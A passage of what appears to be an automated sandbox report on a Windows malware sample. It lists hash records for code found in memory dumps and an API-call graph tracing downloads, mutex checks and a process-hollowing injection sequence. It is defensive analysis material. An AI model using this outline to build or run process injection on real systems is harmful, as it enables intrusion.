                                                                                                                                                                                                                        • Opcode ID: 8f40a77c759dc29fd34afa0aed3b20e27c4bfffbf188d385b0fcd1e74a463be2
                                                                                                                                                                                                                        • Instruction ID: 7d29c517d0a8df9d1c32c81b8656d790e84539fd602447296ab85a55d6707e4d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f40a77c759dc29fd34afa0aed3b20e27c4bfffbf188d385b0fcd1e74a463be2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B2180755093808FCB12CF24D594715BF71FB46224F28C5EED8898B6A7D33A940ACB62
                                                                                                                                                                                                                        Function 025BD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1701517862.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_25bd000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                                                                                                                        • Instruction ID: 50819f6a75c8d20a9bf6fce144e94b59c86a1caa997cab82476df25d2958ce90
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A211D0B6504280DFCB16CF14D9C4B56BF72FF84324F24C6A9D8490B656C37AE45ACBA2
                                                                                                                                                                                                                        Function 053DEC82 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: d3d47b79a91901693fc0f73afad4ad71aed2d00e86857f0f0aab9f02ff298a7f
                                                                                                                                                                                                                        • Instruction ID: 431ea968e59aca3eb997de55b9cc51bf8b3b8bb7c27f143f9539004b2189393f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3d47b79a91901693fc0f73afad4ad71aed2d00e86857f0f0aab9f02ff298a7f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8119132600209AFCB119F64E88496AFBBAFF85210B448569D8459B691CB70FD05DBA0
                                                                                                                                                                                                                        Function 053DEC90 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 8966fdb425e3d38f3349acf4a63408162f027dea6f5112745be603e7ec4c2542
                                                                                                                                                                                                                        • Instruction ID: e0174ada53ef91b8604c8e0480bff04f54c94f952bfa5dd77709cbc1c96ecbfa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8966fdb425e3d38f3349acf4a63408162f027dea6f5112745be603e7ec4c2542
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91117036600209AFCB14EF64E88486EFBBAFF84210B008568E8059B754CB70FD15DBA0
                                                                                                                                                                                                                        Function 053D9C66 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 55cc668efb00f7dc897019c2003483acf77f40b6e12d0a34f8519adecc30d1e2
                                                                                                                                                                                                                        • Instruction ID: b7c71bb032e7ed1dd512baa4970a2f8ecd0cbdccb81fc23f0291097235089e86
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55cc668efb00f7dc897019c2003483acf77f40b6e12d0a34f8519adecc30d1e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94114C36A042598FDB04DB68C594BDDBBF5BF4D310F1581A9D801BB351CB75AC00CBA0
                                                                                                                                                                                                                        Function 025BD989 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1701517862.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_25bd000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 61f6aa5c07b7b3d8a52aae83c89151dbadc775cd9998922b133d5763c4af94d9
                                                                                                                                                                                                                        • Instruction ID: 114c1d14f704f0a7e268c5f60be5b67defea687ac543d6c06e142baa42a28d59
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61f6aa5c07b7b3d8a52aae83c89151dbadc775cd9998922b133d5763c4af94d9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5401DB71006344DBE7115B15CC847A7FFA8FF89625F18C51AED094B28AC7799444C776
                                                                                                                                                                                                                        Function 053D9C78 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 5d3ad17b2fc0950dffa62dbcfa7e2c658d3b3038fb27ad3a75e5c3bad99e0bd9
                                                                                                                                                                                                                        • Instruction ID: aed6e896e74af0af4d937f3586c3ea4bc682993231bfde898f959be6d6846686
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d3ad17b2fc0950dffa62dbcfa7e2c658d3b3038fb27ad3a75e5c3bad99e0bd9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7011736A042189FDB04CBA9C984ADDBBF5BF8C210F1581A9D805BB351DB75AD40CBA0
                                                                                                                                                                                                                        Function 053DEEE2 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 357f5fb591700a0ac26adcfc525062c31eefd413d968b70faa15c3de4373c2f1
                                                                                                                                                                                                                        • Instruction ID: bf4391563145349306d37a966c194c6f8029905213526f729b93752c1e01eb3c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357f5fb591700a0ac26adcfc525062c31eefd413d968b70faa15c3de4373c2f1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8601D6316083049FCB22AB24E480756FBBABFC2311B4585A9D8454F651CF70B805CBA2
                                                                                                                                                                                                                        Function 053DEF58 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 577b7c6775b6ee8ae187d76cd679ad632bbb5d86ba815bb80f8220bedd527277
                                                                                                                                                                                                                        • Instruction ID: 443ff804ff0433ca1b0f9cd7f485aa3bf053290249d66dde91e99e95c8c69e30
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 577b7c6775b6ee8ae187d76cd679ad632bbb5d86ba815bb80f8220bedd527277
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F028323083448FDB42DB38E880955BBF9FF8125530544EAD048CF322DA21EC05CB90
                                                                                                                                                                                                                        Function 025BD988 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1701517862.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_25bd000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 877bfaf9fe16a3d2645f8c953fd35f0e5946368d7247a7913785730816effe29
                                                                                                                                                                                                                        • Instruction ID: e35abf06f2c0b882f34f87c6c8eef784b8d6187ee8989375923766f7ae69dabf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 877bfaf9fe16a3d2645f8c953fd35f0e5946368d7247a7913785730816effe29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBF09671405384AFE7118B16DC84B66FFE8EF85634F18C55AED484B287C379A844CB75
                                                                                                                                                                                                                        Function 053DEEF0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7891b2f4c0c0fd175198edd8a9a3b6e81d4065085860292e59f09a39bc22d00b
                                                                                                                                                                                                                        • Instruction ID: 97612700c39740da81b9bff7d835f50e6df630622802a1f6ff0b1618ad008a17
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7891b2f4c0c0fd175198edd8a9a3b6e81d4065085860292e59f09a39bc22d00b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22F0C2322043049FDB61EB28E980A66F7EAFFC1315B4485BCD4094F611CF70B805CBA1
                                                                                                                                                                                                                        Function 053D9118 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: feaadbe2d14888fa42d80f39079a2a89ea77f93adecbc240baf594b7886b58f0
                                                                                                                                                                                                                        • Instruction ID: 1ba50fe01aae811c5d7f680a112401231b317f0d88ed53c8257232a35a802c68
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: feaadbe2d14888fa42d80f39079a2a89ea77f93adecbc240baf594b7886b58f0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FF0B4727043418BD711DB68E884B5A7BE6BFC81507484469D54D9B211DBA0D8018751
                                                                                                                                                                                                                        Function 053D9D09 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 24c3ad9bf61624c0b3214aefe73dd16a76b549625cd1555cb6a98e320dd9949f
                                                                                                                                                                                                                        • Instruction ID: be4ef3abbc0f177c7e351ad13b1db721d67f392d417171b66d3095de95163424
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24c3ad9bf61624c0b3214aefe73dd16a76b549625cd1555cb6a98e320dd9949f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BEE09B733053008F8B159E99E4D09AAF7B9BB99212325447BE949C7251CA70D845C761
                                                                                                                                                                                                                        Function 053DD895 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 1eb4074ac4acbdf1594d98e66806cc5ea70dd8830888d8043a60ee5ff2675202
                                                                                                                                                                                                                        • Instruction ID: 234e7def2dc99d30578ad34dd882355bbb9737283cd9fe92dd39ae62411ddfa2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eb4074ac4acbdf1594d98e66806cc5ea70dd8830888d8043a60ee5ff2675202
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94F0A9366011099FCB41DF94D9449CDBBB2FB88311B25C290E5185B265C771ED55CB50
                                                                                                                                                                                                                        Function 053DB381 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 99f462af181f369bdc1b5ba886fdd5cd8c7b8313f80a235bfd78d44755829fca
                                                                                                                                                                                                                        • Instruction ID: e66f856a7e67c22cef7d58e3590b27103dae7dfeaaa1e988d926e7c4a2f62ba6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99f462af181f369bdc1b5ba886fdd5cd8c7b8313f80a235bfd78d44755829fca
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E048352157508FC315EF69D4549567BF9FF4A35130284AAE946D7761EB31EC00CFA0
                                                                                                                                                                                                                        Function 053DDB90 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 050d37452dd759e247bdf19fa3a42402d7886e86b0f855129783af495c2ea865
                                                                                                                                                                                                                        • Instruction ID: 53eb4b2ed5134a00650b3239a711a1d5b69a32d218cbb6b9accb09e138e5b4bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 050d37452dd759e247bdf19fa3a42402d7886e86b0f855129783af495c2ea865
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFD01237A0001456CB245A7AB80A6DDBB38FBD0231F09847BE545D7140DA2085668755
                                                                                                                                                                                                                        Function 053DB390 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 4114c9b3450cf7839ecec8bbeff2336cb179fc7247f316bb02d7e41985882876
                                                                                                                                                                                                                        • Instruction ID: 4d0aa50a2cb1bc6e7ff61d68a6547b36a1dedd77012a98cd1ed55ef923807c01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4114c9b3450cf7839ecec8bbeff2336cb179fc7247f316bb02d7e41985882876
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE0B6352116048FC718DF69D048856BBA9FF8926135184A9E95A87760DB31EC00CB90

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:41.7%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:480
                                                                                                                                                                                                                        Total number of Limit Nodes:12
                                                                                                                                                                                                                        execution_graph 1447 7ff6c5db2160 1448 7ff6c5db218a InternetOpenW 1447->1448 1449 7ff6c5db21c4 InternetOpenUrlW 1448->1449 1450 7ff6c5db21b7 Sleep 1448->1450 1451 7ff6c5db224d HttpQueryInfoA 1449->1451 1452 7ff6c5db21fb InternetOpenUrlW 1449->1452 1450->1448 1454 7ff6c5db22a2 1451->1454 1455 7ff6c5db227c InternetCloseHandle InternetCloseHandle Sleep 1451->1455 1452->1451 1453 7ff6c5db2232 InternetCloseHandle Sleep 1452->1453 1453->1448 1456 7ff6c5db2309 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1454->1456 1457 7ff6c5db22ac InternetCloseHandle InternetOpenUrlW 1454->1457 1455->1448 1459 7ff6c5db236e InternetCloseHandle InternetCloseHandle 1456->1459 1463 7ff6c5db2388 1456->1463 1457->1456 1458 7ff6c5db22ee InternetCloseHandle Sleep 1457->1458 1458->1448 1460 7ff6c5db2407 1459->1460 1461 7ff6c5db2390 InternetReadFile 1462 7ff6c5db23de InternetCloseHandle InternetCloseHandle 1461->1462 1461->1463 1462->1460 1463->1461 1463->1462 1445 7ff6c5db1088 GetModuleHandleA GetProcAddress 1446 7ff6c5db10bb 1445->1446 836 7ff6c5db337c 839 7ff6c5db24cc GetModuleFileNameW 836->839 840 7ff6c5db254d 839->840 850 7ff6c5db2548 839->850 841 7ff6c5db25a1 840->841 842 7ff6c5db258b 840->842 882 7ff6c5db240c ExpandEnvironmentStringsW 841->882 843 7ff6c5db25bf 842->843 844 7ff6c5db2595 842->844 883 7ff6c5db244c ExpandEnvironmentStringsW 843->883 844->850 884 7ff6c5db248c ExpandEnvironmentStringsW 844->884 846 7ff6c5db25b6 849 7ff6c5db2611 CreateProcessW 846->849 846->850 849->850 851 7ff6c5db266c CreateFileW 849->851 851->850 852 7ff6c5db26b3 GetFileSize 851->852 853 7ff6c5db26d1 852->853 854 7ff6c5db26db CloseHandle 852->854 853->854 855 7ff6c5db26eb VirtualAlloc 853->855 854->850 856 7ff6c5db2725 ReadFile 855->856 857 7ff6c5db2715 CloseHandle 855->857 858 7ff6c5db2775 CloseHandle GetThreadContext 856->858 859 7ff6c5db2752 VirtualFree CloseHandle 856->859 857->850 860 7ff6c5db27c5 VirtualFree 858->860 861 7ff6c5db27dd ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 858->861 859->850 860->850 862 7ff6c5db2864 VirtualFree 861->862 863 7ff6c5db287c VirtualAllocEx 861->863 862->850 864 7ff6c5db28ff WriteProcessMemory 863->864 865 7ff6c5db28e7 VirtualFree 863->865 866 7ff6c5db2935 VirtualFree 864->866 869 7ff6c5db294d 864->869 865->850 866->850 867 7ff6c5db2983 WriteProcessMemory 868 7ff6c5db2a0e VirtualFree 867->868 867->869 868->850 869->867 874 7ff6c5db2a2b 869->874 870 7ff6c5db2d1c WriteProcessMemory SetThreadContext 872 7ff6c5db2da2 VirtualFree 870->872 873 7ff6c5db2db7 ResumeThread 870->873 871 7ff6c5db2a9d RtlCompareMemory 871->874 878 7ff6c5db2af0 871->878 872->850 875 7ff6c5db2dde VirtualFree 873->875 876 7ff6c5db2dc9 VirtualFree 873->876 874->870 874->871 875->850 876->850 877 7ff6c5db2d17 877->870 878->877 879 7ff6c5db2c20 ReadProcessMemory WriteProcessMemory 878->879 880 7ff6c5db2cf5 VirtualFree 879->880 881 7ff6c5db2d0d 879->881 880->850 881->878 882->846 883->846 884->846 885 7ff6c5db340c 946 7ff6c5db153c 885->946 890 7ff6c5db3424 ExitProcess 891 7ff6c5db342c 1180 7ff6c5db40a4 GetCurrentProcess OpenProcessToken 891->1180 895 7ff6c5db3447 896 7ff6c5db345c 895->896 897 7ff6c5db34ab 895->897 898 7ff6c5db41e4 3 API calls 896->898 900 7ff6c5db34c0 897->900 901 7ff6c5db34fc 897->901 899 7ff6c5db3468 898->899 902 7ff6c5db346f 899->902 903 7ff6c5db3482 ExitProcess 899->903 904 7ff6c5db41e4 3 API calls 900->904 911 7ff6c5db3511 901->911 912 7ff6c5db3552 901->912 905 7ff6c5db41e4 3 API calls 902->905 906 7ff6c5db34cc 904->906 907 7ff6c5db347b 905->907 908 7ff6c5db34d3 ExitProcess 906->908 909 7ff6c5db34db 906->909 907->903 910 7ff6c5db348a 907->910 913 7ff6c5db320c 21 API calls 909->913 1215 7ff6c5db329c 910->1215 1195 7ff6c5db41e4 CreateMutexA 911->1195 1204 7ff6c5db3a34 912->1204 917 7ff6c5db34e0 913->917 921 7ff6c5db34f4 ExitProcess 917->921 922 7ff6c5db34e7 Sleep 917->922 919 7ff6c5db348f 924 7ff6c5db34a3 ExitProcess 919->924 925 7ff6c5db3496 Sleep 919->925 922->917 925->919 926 7ff6c5db3524 ExitProcess 927 7ff6c5db352c 1199 7ff6c5db320c 927->1199 930 7ff6c5db3531 933 7ff6c5db3545 ExitProcess 930->933 934 7ff6c5db3538 Sleep 930->934 931 7ff6c5db35be CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 932 7ff6c5db356a 935 7ff6c5db41e4 3 API calls 932->935 934->930 936 7ff6c5db3576 935->936 937 7ff6c5db3590 ExitProcess 936->937 938 7ff6c5db357d 936->938 939 7ff6c5db41e4 3 API calls 938->939 940 7ff6c5db3589 939->940 940->937 941 7ff6c5db3598 940->941 942 7ff6c5db329c 44 API calls 941->942 943 7ff6c5db359d 942->943 944 7ff6c5db35b1 ExitProcess 943->944 945 7ff6c5db35a4 Sleep 943->945 945->943 1224 7ff6c5db149c LoadLibraryA GetProcAddress 946->1224 948 7ff6c5db15bd 1225 7ff6c5db149c LoadLibraryA GetProcAddress 948->1225 950 7ff6c5db15d7 1226 7ff6c5db14ec LoadLibraryA GetProcAddress 950->1226 952 7ff6c5db15f1 1227 7ff6c5db14ec LoadLibraryA GetProcAddress 952->1227 954 7ff6c5db160b 1228 7ff6c5db14ec LoadLibraryA GetProcAddress 954->1228 956 7ff6c5db1625 1229 7ff6c5db14ec LoadLibraryA GetProcAddress 956->1229 958 7ff6c5db163f 1230 7ff6c5db14ec LoadLibraryA GetProcAddress 958->1230 960 7ff6c5db1659 1231 7ff6c5db14ec LoadLibraryA GetProcAddress 960->1231 962 7ff6c5db1673 1232 7ff6c5db14ec LoadLibraryA GetProcAddress 962->1232 964 7ff6c5db168d 1233 7ff6c5db14ec LoadLibraryA GetProcAddress 964->1233 966 7ff6c5db16a7 1234 7ff6c5db14ec LoadLibraryA GetProcAddress 966->1234 968 7ff6c5db16c1 1235 7ff6c5db149c LoadLibraryA GetProcAddress 968->1235 970 7ff6c5db16db 1236 7ff6c5db149c LoadLibraryA GetProcAddress 970->1236 972 7ff6c5db16f5 1237 7ff6c5db149c LoadLibraryA GetProcAddress 972->1237 974 7ff6c5db170f 1238 7ff6c5db149c LoadLibraryA GetProcAddress 974->1238 976 7ff6c5db1729 1239 7ff6c5db14ec LoadLibraryA GetProcAddress 976->1239 978 7ff6c5db1743 1240 7ff6c5db14ec LoadLibraryA GetProcAddress 978->1240 980 7ff6c5db175d 1241 7ff6c5db14ec LoadLibraryA GetProcAddress 980->1241 982 7ff6c5db1777 1242 7ff6c5db14ec LoadLibraryA GetProcAddress 982->1242 984 7ff6c5db1791 1243 7ff6c5db14ec LoadLibraryA GetProcAddress 984->1243 986 7ff6c5db17ab 1244 7ff6c5db14ec LoadLibraryA GetProcAddress 986->1244 988 7ff6c5db17c5 1245 7ff6c5db14ec LoadLibraryA GetProcAddress 988->1245 990 7ff6c5db17df 1246 7ff6c5db14ec LoadLibraryA GetProcAddress 990->1246 992 7ff6c5db17f9 1247 7ff6c5db14ec LoadLibraryA GetProcAddress 992->1247 994 7ff6c5db1813 1248 7ff6c5db14ec LoadLibraryA GetProcAddress 994->1248 996 7ff6c5db182d 1249 7ff6c5db14ec LoadLibraryA GetProcAddress 996->1249 998 7ff6c5db1847 1250 7ff6c5db14ec LoadLibraryA GetProcAddress 998->1250 1000 7ff6c5db1861 1251 7ff6c5db14ec LoadLibraryA GetProcAddress 1000->1251 1002 7ff6c5db187b 1252 7ff6c5db14ec LoadLibraryA GetProcAddress 1002->1252 1004 7ff6c5db1895 1253 7ff6c5db14ec LoadLibraryA GetProcAddress 1004->1253 1006 7ff6c5db18af 1254 7ff6c5db14ec LoadLibraryA GetProcAddress 1006->1254 1008 7ff6c5db18c9 1255 7ff6c5db14ec LoadLibraryA GetProcAddress 1008->1255 1010 7ff6c5db18e3 1256 7ff6c5db14ec LoadLibraryA GetProcAddress 1010->1256 1012 7ff6c5db18fd 1257 7ff6c5db14ec LoadLibraryA GetProcAddress 1012->1257 1014 7ff6c5db1917 1258 7ff6c5db14ec LoadLibraryA GetProcAddress 1014->1258 1016 7ff6c5db1931 1259 7ff6c5db14ec LoadLibraryA GetProcAddress 1016->1259 1018 7ff6c5db194b 1260 7ff6c5db14ec LoadLibraryA GetProcAddress 1018->1260 1020 7ff6c5db1965 1261 7ff6c5db14ec LoadLibraryA GetProcAddress 1020->1261 1022 7ff6c5db197f 1262 7ff6c5db14ec LoadLibraryA GetProcAddress 1022->1262 1024 7ff6c5db1999 1263 7ff6c5db14ec LoadLibraryA GetProcAddress 1024->1263 1026 7ff6c5db19b3 1264 7ff6c5db14ec LoadLibraryA GetProcAddress 1026->1264 1028 7ff6c5db19cd 1265 7ff6c5db14ec LoadLibraryA GetProcAddress 1028->1265 1030 7ff6c5db19e7 1266 7ff6c5db14ec LoadLibraryA GetProcAddress 1030->1266 1032 7ff6c5db1a01 1267 7ff6c5db14ec LoadLibraryA GetProcAddress 1032->1267 1034 7ff6c5db1a1b 1268 7ff6c5db14ec LoadLibraryA GetProcAddress 1034->1268 1036 7ff6c5db1a35 1269 